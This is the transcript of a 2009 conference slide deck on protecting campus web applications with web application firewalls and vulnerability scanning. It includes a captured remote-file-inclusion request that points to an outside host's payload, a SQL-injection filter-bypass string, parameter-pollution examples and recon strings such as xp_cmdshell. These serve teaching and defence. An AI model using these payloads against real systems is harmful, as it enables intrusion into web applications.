Securing Campus Web Applications with Vulnerability Assessments (VA) and Web Application Firewalls (WAFs) Neil Matatall  |...
Glossary <ul><li>WAF = Web Application Firewall </li></ul><ul><li>IDS = Intrusion Detection System </li></ul><ul><li>IPS =...
Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Fir...
Let’s Make It Clear <ul><li>We have used open source WAFs as well as commercial WAFs </li></ul><ul><li>I am here to sell y...
About UCI <ul><li>Founded in 1965  </li></ul><ul><ul><li>~27,631 Students </li></ul></ul><ul><ul><li>~14,228 employees </l...
Security Is All About The Layers <ul><li>No single solution that makes everything secure exists </li></ul><ul><li>When one...
Commonly Overheard Misconceptions of Application Security <ul><li>“ Our site is secure because it uses SSL” </li></ul><ul>...
Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Fir...
Visual Representation of WAFs
What a WAF is: <ul><li>From http://www.owasp.org : </li></ul><ul><ul><li>An appliance, web server plugin, or filter that a...
The OSI Stack The Application Set is handled by Web Application Firewalls The transport set is handle by traditional netwo...
What a WAF is (Cont’d) <ul><li>“ HTTP-aware IPS/IDS on steroids” </li></ul><ul><li>A way to analyze the requests and respo...
What a WAF is not <ul><li>A “traditional” firewall </li></ul><ul><ul><li>Firewalls generally inspect IP addresses and port...
XKCD – Missing the Point http://xkcd.com/538
Why You Need A WAF <ul><li>82% of Web applications have vulnerabilities 1 </li></ul><ul><li>75% of all Internet attacks ta...
The Most Widespread Vulnerabilities in Web Applications  WASC - Web Application Security Statistics
Why WAFs Are Attractive in Higher ED <ul><li>We typically have a very diverse pool of code </li></ul><ul><li>Tight resourc...
Example Attack: What the WAF Sees <ul><li>G​E​T​  /​/​/​/​ ? _​S​E​R​V​E​R​[​D​O​C​U​M​E​N​T​_​R​O​O​T​]​ = h​t​t​p​:​/​/​...
Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Fir...
Step One: ModSecurity <ul><li>Apache Module </li></ul><ul><li>“ Negative” security model </li></ul><ul><ul><li>signature b...
Before ModSecurity
After ModSecurity
Step Two: Taking the Dive…Vendors <ul><li>ModSecurity was getting difficult to manage… </li></ul><ul><ul><li>Only one pers...
Downside of Negative Security Model <ul><li>ModSecurity uses only signature-based protection </li></ul><ul><li>Like AV, th...
Step 1.5 <ul><li>Keeping ModSecurity up while deploying a vendor product </li></ul><ul><ul><li>As we gradually moved hosts...
Common Features of Commercial Products <ul><li>“ Positive Security Model” </li></ul><ul><ul><li>Learning mode:  tries to p...
Positive Security Model Examples <ul><li>Parameter Type Violation: Unexpected Groups: Asterix, Numeric, Parenthesis </li><...
 
Tips & Tricks <ul><li>Pair prod/test servers to reduce profiling time </li></ul><ul><li>Ignore Search Crawlers first! </li...
WAF Lifecycle <ul><li>First, tune the alerts to a manageable amount </li></ul><ul><li>Next, spend a good amount of time si...
WAF Options <ul><li>Options: Server Plugin, Network Device, Code </li></ul><ul><li>Open Source: ModSecurity, PHPIDS, WebKn...
Deployment Options Matrix WEB APPLICATION FIREWALL DEPLOYMENT MODE CONSIDERATIONS: INLINE VS. OUT-OF-LINE
<ul><li>Non-Inline Deployment </li></ul><ul><li>Reverse Proxy Deployment </li></ul><ul><li>Inline Bridge Deployment </li><...
Which WAF is Right for You? <ul><li>Things to consider: </li></ul><ul><ul><li>How many applications do you have? </li></ul...
Bonus: Database Monitoring <ul><li>Run assessments on DB server configuration </li></ul><ul><li>Audit all access to tables...
Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Fir...
Vulnerability Assessments <ul><li>Use automated tools to check for the common vulnerabilities in applications </li></ul><u...
Vulnerability Assessment Strategies <ul><li>Manual </li></ul><ul><ul><li>Use proxies and other tools to manually assess th...
Scan When <ul><li>PCI-DSS requires a penetration test once a year </li></ul><ul><li>We integrate AppScan into our developm...
Scan What <ul><li>For new or critical applications, we scan the entire application  </li></ul><ul><ul><li>This can involve...
Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Fir...
Synergy Bliss <ul><li>AppScan </li></ul><ul><ul><li>Verified vulnerabilities would be “virtually patched” by importing sca...
Synergy Bliss Continued <ul><li>Scan what? </li></ul><ul><ul><li>Verify that all URLs learned by your WAF have been tested...
Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Fir...
New Form of Social Engineering? <ul><li>I noticed abnormally large amount of “Parameter Type” and “Parameter Value Length”...
WAF Weakening Flavors <ul><li>Wolf in sheep’s clothing: where the attacker adds suspicious characters to seemingly harmles...
Bypassing WAFs <ul><li>HTTP Parameter Pollution </li></ul><ul><ul><li>Web servers handle “Pollution” differently </li></ul...
Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Fir...
Lessons Learned <ul><li>The WAF takes a great amount of time for tuning </li></ul><ul><li>Running in bridge mode will caus...
WAF Issues Encountered <ul><li>Caused some networking issues with availability monitors </li></ul><ul><li>Sometimes it wou...
Because the WAF Says So <ul><li>There have been a few cases where we had to bend to the WAFs demands </li></ul><ul><ul><li...
WAF Wins <ul><li>NO BREACHES!!!! *knock on wood </li></ul><ul><li>Caught Outgoing SSNs and CCs </li></ul><ul><li>Assessmen...
Side Benefits <ul><li>Encourages the separation of Web/DB servers </li></ul><ul><li>First real throughput numbers </li></u...
Leaving Thoughts… <ul><li>Positive security models document parameters, values, and bounds </li></ul><ul><ul><li>What if y...
References <ul><li>WAFs </li></ul><ul><ul><li>Open Source </li></ul></ul><ul><ul><ul><li>ModSecurity </li></ul></ul></ul><...
References Cont’d <ul><li>Web Application Firewall Evaluation Criteria </li></ul><ul><ul><li>http://www.webappsec.org/proj...
References Cont’d <ul><li>We’ve Been Blind to Attacks on Our Web Sites </li></ul><ul><li>Why Did Our Web Application Crash...
<ul><li>Copyright Neil Matatall 2009. This work is the intellectual property of the author. Permission is granted for this...
Upcoming SlideShare
Loading in …5
×

2009: Securing Applications With Web Application Firewalls and Vulnerability Assessments

5,447 views
5,242 views

Published on

Redactions:
- XSS escaping is much more complex than what is shown. See OWASP XSS Cheat Sheet

Published in: Education, Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
5,447
On SlideShare
0
From Embeds
0
Number of Embeds
274
Actions
Shares
0
Downloads
253
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide
  • 11/04/09 Mention that this talk will be focused mostly on WAFs, ask if anyone is thoroughly disappointed
  • 11/04/09
  • 11/04/09
  • 11/04/09
  • 11/04/09 (Figures from 2009)
  • 11/04/09
  • 11/04/09
  • 11/04/09
  • 11/04/09 The smoking guy was the “boss” from the lovelycharts.com Notice that the intranet does not bypass the waf
  • 11/04/09
  • 11/04/09
  • 11/04/09 Scope Creep!
  • 11/04/09 WAFs take a LOT of time Too often I hear, if we have a WAF, why do we need to write secure code? One of the biggest surprises to us was how much time and effort is involved
  • 11/04/09
  • 11/04/09 Same goes for open source…
  • 11/04/09 WAFs handle 4 out of 5 of these gracefully, RFI
  • 11/04/09 AppScan/ Static analysis is difficult with a large number of small purpose apps.
  • 11/04/09
  • 11/04/09
  • 11/04/09
  • 11/04/09 Mention IDS/IPS can’t inspect SSL traffic
  • 11/04/09
  • 11/04/09
  • 11/04/09
  • 11/04/09 This left us open when our device failed.
  • 11/04/09
  • 11/04/09
  • 11/04/09
  • 11/04/09
  • 11/04/09 It’s no good if you can’t spend the time tuning after every alert Mention the “strict profile” versus normal profile Mention profiling reports!
  • 11/04/09
  • 11/04/09
  • 11/04/09 SecureSphere Web Application Firewall Presentation May 21, 2007 Imperva Mentiond the hidden slide matrix
  • 11/04/09
  • 11/04/09
  • 11/04/09
  • 11/04/09
  • 11/04/09
  • 11/04/09
  • 11/04/09 Outside scans may get blocked for other reasons.
  • 11/04/09
  • 11/04/09 Much more accurate for XSS protection. Correllation rules are sad, virtual patches are accurate
  • 11/04/09
  • 11/04/09
  • 11/04/09 Inattentive? That just sounds weird
  • 11/04/09 Note the single and double quote at the end of the name If a signature is detected, then the WAF doesn’t request
  • 11/04/09
  • 11/04/09
  • 11/04/09
  • 11/04/09 Connection resets instead of error pages for certain classes
  • 11/04/09
  • 11/04/09 Fixed DWH, Library problem, caught
  • 11/04/09 Having DB on same host as web server forces us to install an agent Messed up parameters caused unknown param alertss: &amp;amp;variable
  • 11/04/09 -1.02 is not considered “numeric”
  • 11/04/09 Fortify will do static analysis on your code if it is open source
  • 11/04/09
  • 11/04/09
  • 11/04/09
  • 2009: Securing Applications With Web Application Firewalls and Vulnerability Assessments

    1. 1. Securing Campus Web Applications with Vulnerability Assessments (VA) and Web Application Firewalls (WAFs) Neil Matatall | November 5, 2009 University of California, Irvine OWASP Orange County Chapter Lead Educause Effective Practices WG Member
    2. 2. Glossary <ul><li>WAF = Web Application Firewall </li></ul><ul><li>IDS = Intrusion Detection System </li></ul><ul><li>IPS = Intrusion Prevention System </li></ul><ul><li>AppSec = Application Security </li></ul><ul><li>SOX, PCI, HIPAA, FERPA = Compliance </li></ul><ul><li>OWASP = Open Web Application Security Project </li></ul><ul><li>WASC = Web Application Security Consortium </li></ul>
    3. 3. Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Firewalls </li></ul><ul><li>Vulnerability Assessments </li></ul><ul><li>Synergy </li></ul><ul><li>WAF Evasion Techniques </li></ul><ul><li>Wrap Up </li></ul>
    4. 4. Let’s Make It Clear <ul><li>We have used open source WAFs as well as commercial WAFs </li></ul><ul><li>I am here to sell you on the idea of WAFs, but not to sell you a WAF </li></ul><ul><li>I will try to confuse you </li></ul><ul><li>Every situation is different </li></ul><ul><li>Key phrase: it depends! </li></ul>
    5. 5. About UCI <ul><li>Founded in 1965 </li></ul><ul><ul><li>~27,631 Students </li></ul></ul><ul><ul><li>~14,228 employees </li></ul></ul><ul><li>Rapidly expanding while our budget is rapidly shrinking </li></ul><ul><li>Recently started consolidating IT across the campus </li></ul><ul><ul><li>The Security team was one of the first groups to work together across former business units </li></ul></ul>
    6. 6. Security Is All About The Layers <ul><li>No single solution that makes everything secure exists </li></ul><ul><li>When one layer fails, and it will, there should be a compensating strategy </li></ul>This is commonly known as the “Defense in Depth” Strategy
    7. 7. Commonly Overheard Misconceptions of Application Security <ul><li>“ Our site is secure because it uses SSL” </li></ul><ul><li>“ Our site is secure because we have a network firewall” </li></ul><ul><li>“ A hacker will never do that” </li></ul>
    8. 8. Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Firewalls </li></ul><ul><li>Vulnerability Assessments </li></ul><ul><li>Synergy </li></ul><ul><li>WAF Evasion Techniques </li></ul><ul><li>Wrap Up </li></ul>
    9. 9. Visual Representation of WAFs
    10. 10. What a WAF is: <ul><li>From http://www.owasp.org : </li></ul><ul><ul><li>An appliance, web server plugin, or filter that applies a set of rules to an HTTP conversation </li></ul></ul><ul><ul><li>Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection </li></ul></ul><ul><li>A WAF inspects the HTTP content at the application layer, beyond what a network firewall would typically inspect at the IP and transport layers </li></ul>
    11. 11. The OSI Stack The Application Set is handled by Web Application Firewalls The transport set is handle by traditional network firewalls
    12. 12. What a WAF is (Cont’d) <ul><li>“ HTTP-aware IPS/IDS on steroids” </li></ul><ul><li>A way to analyze the requests and responses for suspicious activity </li></ul><ul><li>A way to increase visibility of web traffic 1 </li></ul><ul><li>A debug tool 2 </li></ul><ul><li>An incredibly powerful, complex, and difficult beast </li></ul><ul><li>1. We’ve Been Blind to Attacks on Our Web Sites </li></ul><ul><li>2. Ryan Barnett: Why Did Our Web Application Crash? Leveraging WAF Logging Data </li></ul>
    13. 13. What a WAF is not <ul><li>A “traditional” firewall </li></ul><ul><ul><li>Firewalls generally inspect IP addresses and ports, layers 3 and 4 </li></ul></ul><ul><ul><li>WAFs inspect HTTP requests/responses at layer 7 </li></ul></ul><ul><li>A magical device that works on its own </li></ul><ul><li>An end-all solution to all application security problems </li></ul><ul><li>An excuse to write insecure code </li></ul>
    14. 14. XKCD – Missing the Point http://xkcd.com/538
    15. 15. Why You Need A WAF <ul><li>82% of Web applications have vulnerabilities 1 </li></ul><ul><li>75% of all Internet attacks target applications 2 </li></ul><ul><li>PCI-DSS </li></ul><ul><ul><li>6.6: Installing a web-application layer firewall in front of public facing web applications. </li></ul></ul><ul><ul><li>10: Track and monitor all access to credit card data </li></ul></ul><ul><li>Software Vendors may not be willing (or even in business) to fix vulnerabilities </li></ul>1 White Hat - statistic for initial examination; 2 Gartner Research;
    16. 16. The Most Widespread Vulnerabilities in Web Applications WASC - Web Application Security Statistics
    17. 17. Why WAFs Are Attractive in Higher ED <ul><li>We typically have a very diverse pool of code </li></ul><ul><li>Tight resources make fixing the code a painful process </li></ul><ul><li>Many small, single-purpose applications make alternative technologies difficult to use </li></ul><ul><li>Built-in user community </li></ul><ul><ul><li>Campus Groups </li></ul></ul><ul><ul><li>Educause Effective Practices Group </li></ul></ul><ul><ul><li>Mailing Lists </li></ul></ul>
    18. 18. Example Attack: What the WAF Sees <ul><li>G​E​T​ /​/​/​/​ ? _​S​E​R​V​E​R​[​D​O​C​U​M​E​N​T​_​R​O​O​T​]​ = h​t​t​p​:​/​/​s​p​o​r​t​s​u​l​s​a​n​.​c​o​.​k​r​/​p​o​l​l​/​a​i​p​i​/​i​d​.​t​x​t​?​?​   HTTP/1.1 </li></ul><ul><li>T​E​: d​e​f​l​a​t​e​,​g​z​i​p​;​q​=​0​.​3​ </li></ul><ul><li>C​o​n​n​e​c​t​i​o​n​: T​E​,​ ​c​l​o​s​e​ </li></ul><ul><li>H​o​s​t​: w​w​w​.somesite.com </li></ul><ul><li>U​s​e​r​-​A​g​e​n​t​: M​o​z​i​l​l​a​/​5​.​0​ </li></ul>OWASP Top 10: #3 Malicious File Execution (RFI)
    19. 19. Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Firewalls </li></ul><ul><li>Vulnerability Assessments </li></ul><ul><li>Synergy </li></ul><ul><li>WAF Evasion Techniques </li></ul><ul><li>Wrap Up </li></ul>
    20. 20. Step One: ModSecurity <ul><li>Apache Module </li></ul><ul><li>“ Negative” security model </li></ul><ul><ul><li>signature based – checks for known attacks </li></ul></ul><ul><ul><li>Similar to anti-virus </li></ul></ul><ul><li>Open Source! </li></ul><ul><li>OWASP Core Rules Set: Best Starting Point </li></ul><ul><li>Accepted as the best open source WAF </li></ul><ul><li>Sees the SSL traffic after Apache has decrypted the traffic </li></ul>
    21. 21. Before ModSecurity
    22. 22. After ModSecurity
    23. 23. Step Two: Taking the Dive…Vendors <ul><li>ModSecurity was getting difficult to manage… </li></ul><ul><ul><li>Only one person was trained to update the rules </li></ul></ul><ul><ul><li>Multiple instances meant multiple updates and upgrades </li></ul></ul><ul><li>No protection for IIS, difficult for Windows </li></ul><ul><ul><li>WebKnight did not meet our needs </li></ul></ul><ul><li>The vendor products had many features ModSecurity did not have </li></ul><ul><ul><li>Mainly, the Positive Security Model </li></ul></ul>
    24. 24. Downside of Negative Security Model <ul><li>ModSecurity uses only signature-based protection </li></ul><ul><li>Like AV, these can be bypassed with the smallest tweak </li></ul><ul><li>E.g. UNION SQL Injection Attack 1 </li></ul><ul><li>BLOCKED : /?id=1+union+select+1,2,3 /* </li></ul><ul><li>NOT BLOCKED: / ?id=1/*union*/union /*select*/ select+1,2,3 -- </li></ul><ul><ul><ul><li>After being processed, the request will become: </li></ul></ul></ul><ul><ul><ul><ul><li>index.php?id=1/*uni X on*/union /*sel X ect*/ select+1,2,3 -- </li></ul></ul></ul></ul><ul><ul><ul><li>Query: “select * from somewhere where id=“ + id </li></ul></ul></ul><ul><ul><ul><ul><li>Becomes: select * from somewhere where id=1 union select 1,2,3 -- </li></ul></ul></ul></ul>1. Methods to Bypass a Web Application Firewall
    25. 25. Step 1.5 <ul><li>Keeping ModSecurity up while deploying a vendor product </li></ul><ul><ul><li>As we gradually moved hosts behind the vendor WAF, we left ModSecurity up while the vendor WAF is in learning mode </li></ul></ul><ul><ul><li>We removed ModSecurity once we were certain that the vendor device was functioning better than ModSecurity </li></ul></ul><ul><li>Surprisingly, nobody noticed a performance hit when running the network device in tandem with ModSecurity </li></ul>
    26. 26. Common Features of Commercial Products <ul><li>“ Positive Security Model” </li></ul><ul><ul><li>Learning mode: tries to profile applications and learn “normal” behavior </li></ul></ul><ul><ul><li>Also employs Negative security model as well </li></ul></ul><ul><li>User tracking: record logins and associate traffic with user names (DB and Web) </li></ul><ul><li>Reporting </li></ul><ul><li>Decrypt SSL Traffic </li></ul>
    27. 27. Positive Security Model Examples <ul><li>Parameter Type Violation: Unexpected Groups: Asterix, Numeric, Parenthesis </li></ul><ul><li>Parameter Value Length Violation: Size=10, Max=3 </li></ul><ul><li>Unauthorized Method: PUT </li></ul><ul><li>Cookie Poisoning: Cookie value expected=a, Observed=b </li></ul><ul><li>Unknown Parameter: _SERVER[DOCUMENT_ROOT] </li></ul>
    28. 29. Tips & Tricks <ul><li>Pair prod/test servers to reduce profiling time </li></ul><ul><li>Ignore Search Crawlers first! </li></ul><ul><li>I know this sounds like blasphemy, but start with loose restrictions and tighten as you go </li></ul><ul><li>Know thyself: application owners must be involved </li></ul><ul><li>An application security expert MUST be at the helms if you want to use the device effectively </li></ul><ul><li>Proactive monitoring saves a great deal of time in the long run </li></ul>
    29. 30. WAF Lifecycle <ul><li>First, tune the alerts to a manageable amount </li></ul><ul><li>Next, spend a good amount of time simply learning the applications and tuning the WAF </li></ul><ul><ul><li>The main goal is to learn all parameter names </li></ul></ul><ul><li>Slowly tighten restrictions </li></ul><ul><ul><li>Start applying anything you removed in the first phase </li></ul></ul><ul><ul><li>Enable harsher responses, such as IP or User blocking </li></ul></ul><ul><li>The ultimate goal is to have a WAF with no exceptions </li></ul>
    30. 31. WAF Options <ul><li>Options: Server Plugin, Network Device, Code </li></ul><ul><li>Open Source: ModSecurity, PHPIDS, WebKnight, OWASP ESAPI </li></ul><ul><li>Vendor: Imperva, Breach, F5 </li></ul><ul><li>and many more http://www.xiom.com/waf/products </li></ul>
    31. 32. Deployment Options Matrix WEB APPLICATION FIREWALL DEPLOYMENT MODE CONSIDERATIONS: INLINE VS. OUT-OF-LINE
    32. 33. <ul><li>Non-Inline Deployment </li></ul><ul><li>Reverse Proxy Deployment </li></ul><ul><li>Inline Bridge Deployment </li></ul>Deployment Options <ul><li>Transparent Inline Bridge </li></ul><ul><ul><li>Supports full enforcement </li></ul></ul><ul><ul><li>High performance, low latency </li></ul></ul><ul><ul><li>Fail-open interfaces </li></ul></ul><ul><li>Transparent & Reverse Proxy </li></ul><ul><ul><li>High performance for content modification </li></ul></ul><ul><ul><li>URL rewriting, cookie signing, SSL termination </li></ul></ul><ul><li>Non-inline Deployment </li></ul>Switch SecureSphere Data Center SecureSphere INTERNET SecureSphere Slides For Customer
    33. 34. Which WAF is Right for You? <ul><li>Things to consider: </li></ul><ul><ul><li>How many applications do you have? </li></ul></ul><ul><ul><li>What types of servers do your applications run on? </li></ul></ul><ul><ul><li>How much time do you have to devote to this? </li></ul></ul><ul><ul><li>Do you have someone knowledgeable in application security? </li></ul></ul><ul><ul><li>How much money do you have? </li></ul></ul><ul><li>Review the Web Application Firewall Evaluation Criteria from WASC (webappsec.org) </li></ul>
    34. 35. Bonus: Database Monitoring <ul><li>Run assessments on DB server configuration </li></ul><ul><li>Audit all access to tables, logins, etc </li></ul><ul><li>Forensic capabilities, records each query </li></ul><ul><li>Enforce SOX, PCI, HIPAA, etc </li></ul><ul><li>Restrict access based on time, location, etc </li></ul><ul><li>Reports: Access to sensitive tables, assessment results, new accounts created </li></ul>
    35. 36. Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Firewalls </li></ul><ul><li>Vulnerability Assessments </li></ul><ul><li>Synergy </li></ul><ul><li>WAF Evasion Techniques </li></ul><ul><li>Wrap Up </li></ul>
    36. 37. Vulnerability Assessments <ul><li>Use automated tools to check for the common vulnerabilities in applications </li></ul><ul><li>Generally sends a request meant to cause the application to behave incorrectly </li></ul><ul><ul><li>For XSS it usually sends <script> tags to see if < becomes &lt; </li></ul></ul><ul><ul><li>For SQL Injection it sends ‘;”-= to see if an exception is thrown </li></ul></ul><ul><li>Some can scan web services </li></ul><ul><li>Some can perform penetration testing </li></ul>
    37. 38. Vulnerability Assessment Strategies <ul><li>Manual </li></ul><ul><ul><li>Use proxies and other tools to manually assess the posture of the application </li></ul></ul><ul><li>Automated </li></ul><ul><ul><li>Give a tool a starting point and let it discover </li></ul></ul><ul><ul><li>Crawling, Analyzing, and Testing Phases </li></ul></ul><ul><li>SAAS </li></ul><ul><ul><li>Continually test the application for vulnerabilities </li></ul></ul>
    38. 39. Scan When <ul><li>PCI-DSS requires a penetration test once a year </li></ul><ul><li>We integrate AppScan into our development lifecycle </li></ul><ul><ul><li>All new applications undergo a full scan </li></ul></ul><ul><ul><li>All “major changes” undergo a full re-scan </li></ul></ul><ul><ul><li>All minor changes require a small, focused scan </li></ul></ul>
    39. 40. Scan What <ul><li>For new or critical applications, we scan the entire application </li></ul><ul><ul><li>This can involve multiple sets of credentials </li></ul></ul><ul><li>Production or Test Machines? </li></ul><ul><ul><li>We scan test machines </li></ul></ul><ul><ul><li>Test environment must mirror production environment </li></ul></ul><ul><li>Inside or outside the network? </li></ul><ul><ul><li>Always done from inside the network </li></ul></ul>
    40. 41. Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Firewalls </li></ul><ul><li>Vulnerability Assessments </li></ul><ul><li>Synergy </li></ul><ul><li>WAF Evasion Techniques </li></ul><ul><li>Wrap Up </li></ul>
    41. 42. Synergy Bliss <ul><li>AppScan </li></ul><ul><ul><li>Verified vulnerabilities would be “virtually patched” by importing scan results </li></ul></ul><ul><li>Splunk </li></ul><ul><ul><li>Send events over syslog to central log server to correlate events across all layers and hosts </li></ul></ul><ul><ul><li>Correlate audit data to system events (in progress) </li></ul></ul><ul><li>Intrusion Prevention System </li></ul><ul><ul><li>Create signatures for blatant attacks and block them at a lower level </li></ul></ul>
    42. 43. Synergy Bliss Continued <ul><li>Scan what? </li></ul><ul><ul><li>Verify that all URLs learned by your WAF have been tested by your scanner </li></ul></ul><ul><li>or </li></ul><ul><ul><li>Use the scanner to explore your site </li></ul></ul><ul><li>Scan When? </li></ul><ul><ul><li>You can use the statistics generated by your WAF to detect changes to applications (lifecycle FAIL) </li></ul></ul><ul><li>Ryan Barnett: Scanner and WAF Data Sharing </li></ul>
    43. 44. Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Firewalls </li></ul><ul><li>Vulnerability Assessments </li></ul><ul><li>Synergy </li></ul><ul><li>WAF Evasion Techniques </li></ul><ul><li>Wrap Up </li></ul>
    44. 45. New Form of Social Engineering? <ul><li>I noticed abnormally large amount of “Parameter Type” and “Parameter Value Length” violations where “normal” input had “suspicious” data </li></ul><ul><li>An inattentive operator may have added these to the profile, thus weakening the WAF for an upcoming attack </li></ul><ul><li>“ Sounds like another method of social engineering to me. Victimizing the managers who demand uptime and ease of use over security” </li></ul>
    45. 46. WAF Weakening Flavors <ul><li>Wolf in sheep’s clothing: where the attacker adds suspicious characters to seemingly harmless data </li></ul><ul><ul><li>GET /somefile.html?name=Neil Matatall’” </li></ul></ul><ul><li>Tricking the profiler when the app is still in learning mode to learn potentially malicious behavior </li></ul><ul><ul><li>Do recon by adding blatant attacks (cmd.exe, xp_cmdshell, <script>) </li></ul></ul>
    46. 47. Bypassing WAFs <ul><li>HTTP Parameter Pollution </li></ul><ul><ul><li>Web servers handle “Pollution” differently </li></ul></ul><ul><ul><li>The WAF must know the underlying architecture to handle this accordingly </li></ul></ul><ul><ul><li>E.g. / index.jsp ? par1=val1 & par1=val2 </li></ul></ul>Methods to Bypass a Web Application Firewall
    47. 48. Agenda <ul><li>Introduction </li></ul><ul><li>Web Application Firewalls </li></ul><ul><li>Implementing Web Application Firewalls </li></ul><ul><li>Vulnerability Assessments </li></ul><ul><li>Synergy </li></ul><ul><li>WAF Evasion Techniques </li></ul><ul><li>Wrap Up </li></ul>
    48. 49. Lessons Learned <ul><li>The WAF takes a great amount of time for tuning </li></ul><ul><li>Running in bridge mode will cause network interruptions </li></ul>
    49. 50. WAF Issues Encountered <ul><li>Caused some networking issues with availability monitors </li></ul><ul><li>Sometimes it would cause erratic behavior when blocking responses </li></ul>
    50. 51. Because the WAF Says So <ul><li>There have been a few cases where we had to bend to the WAFs demands </li></ul><ul><ul><li>Non-standard query strings lessened the WAFs coverage </li></ul></ul><ul><ul><li>Re-architect VLANs </li></ul></ul><ul><ul><li>SVN had to be moved to another port </li></ul></ul><ul><ul><li>Parameter names had to be adjusted </li></ul></ul>
    51. 52. WAF Wins <ul><li>NO BREACHES!!!! *knock on wood </li></ul><ul><li>Caught Outgoing SSNs and CCs </li></ul><ul><li>Assessments: Scuba Failed, SecureSphere wins </li></ul><ul><li>Collaboration with campus networking group resulted in signatures being added to IDS </li></ul><ul><li>Caught campus-wide No-Nos </li></ul><ul><ul><li>Developers were using GET when POST was required </li></ul></ul><ul><ul><li>Servers were leaking code, developers didn’t know </li></ul></ul><ul><li>Helped debug application issues (scope creep!) </li></ul>
    52. 53. Side Benefits <ul><li>Encourages the separation of Web/DB servers </li></ul><ul><li>First real throughput numbers </li></ul><ul><li>Improved Code Quality </li></ul><ul><li>Discovered Broken Links </li></ul><ul><li>Discovered Longest Response Times </li></ul>
    53. 54. Leaving Thoughts… <ul><li>Positive security models document parameters, values, and bounds </li></ul><ul><ul><li>What if you could do full input validation in the WAF? </li></ul></ul><ul><li>Complex Data types? Email Address? Filenames? Phone Numbers? Currency? </li></ul><ul><li>Access Management? </li></ul><ul><ul><li>In a large number of cases, all authorization decisions can be made based on parameters/cookies/session information </li></ul></ul>
    54. 55. References <ul><li>WAFs </li></ul><ul><ul><li>Open Source </li></ul></ul><ul><ul><ul><li>ModSecurity </li></ul></ul></ul><ul><ul><li>Vendors </li></ul></ul><ul><ul><ul><li>Imperva , Breach , F5 </li></ul></ul></ul><ul><li>Vulnerability Assessments </li></ul><ul><ul><li>Open Source </li></ul></ul><ul><ul><ul><li>Joomla , Fortify* Open Review Project </li></ul></ul></ul><ul><ul><li>Vendor </li></ul></ul><ul><ul><ul><li>WhiteHat Security , IBM AppScan , HP Web Inpsect , Cenzic , NT Objectives </li></ul></ul></ul>
    55. 56. References Cont’d <ul><li>Web Application Firewall Evaluation Criteria </li></ul><ul><ul><li>http://www.webappsec.org/projects/wafec/ </li></ul></ul><ul><li>Web Application Scanner Evaluation Criteria </li></ul><ul><ul><li>http://projects.webappsec.org/Web-Application-Security-Scanner-Evaluation-Criteria </li></ul></ul>
    56. 57. References Cont’d <ul><li>We’ve Been Blind to Attacks on Our Web Sites </li></ul><ul><li>Why Did Our Web Application Crash? Leveraging WAF Logging Data </li></ul><ul><li>Scanner and WAF Data Sharing </li></ul><ul><li>Web Application Security Statistics </li></ul><ul><li>Methods to Bypass a Web Application Firewall </li></ul><ul><li>Web Application Firewall Products </li></ul><ul><li>Web Application Firewall Deployment Mode Considerations </li></ul><ul><li>Web Application Firewall Evaluation Criteria </li></ul><ul><li>Application Scanner Evaluation Criteria </li></ul><ul><li>Approved Scanning Vendors </li></ul><ul><li>xkcd : Security </li></ul>
    57. 58. <ul><li>Copyright Neil Matatall 2009. This work is the intellectual property of the author. Permission is granted for this material to be shared for non-commercial, educational purposes, provided that this copyright statement appears on the reproduced materials and notice is given that the copying is by permission of the author. To disseminate otherwise or to republish requires written permission from the author. </li></ul>

    ×